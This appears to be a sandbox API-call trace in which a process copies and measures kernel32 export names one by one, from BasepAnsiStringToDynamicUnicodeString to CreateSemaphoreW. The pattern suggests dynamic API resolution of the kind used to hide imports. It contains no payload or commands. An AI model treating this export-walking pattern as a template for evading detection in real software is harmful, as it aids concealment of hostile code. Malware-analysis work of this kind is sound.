[0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.762] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.762] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.762] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.762] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.763] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.763] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.763] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.763] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.763] lstrlenA (lpString="BEEP") returned 4 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.763] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.763] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.763] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.763] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.763] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.763] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.763] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.763] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.763] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.763] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.763] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.763] lstrlenA (lpString="CANCELIO") returned 8 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.763] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.763] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.763] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.764] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.764] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.764] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.764] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.764] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.764] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.764] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.764] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.764] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.764] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.764] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.764] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.764] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.764] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.764] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.764] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.764] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.764] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.764] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.764] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.765] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.765] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.765] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.765] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.765] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.765] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.765] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.765] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.765] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.765] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.765] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.765] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.765] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.765] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.765] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.765] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.765] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.765] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.765] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.765] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.766] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.766] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.766] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.766] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.766] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.766] lstrlenA (lpString="COPYFILEA") returned 9 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.766] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.766] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.766] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.766] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.766] lstrlenA (lpString="COPYFILEW") returned 9 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.766] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.766] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.766] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.766] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.766] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.766] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.766] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.766] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.766] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.766] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.767] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.767] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.767] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.767] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.767] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.767] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.767] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.767] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.767] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.767] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.767] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.767] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.767] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.767] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.767] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.767] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.767] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.767] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.767] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.767] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.768] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.768] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.768] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.768] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.768] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.768] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.768] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.768] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.768] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.768] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.768] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.768] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.768] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.768] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.768] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.768] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.768] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.768] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.768] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.768] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.769] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.769] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.769] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.769] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.769] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.769] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.769] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.769] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.769] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.769] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.769] 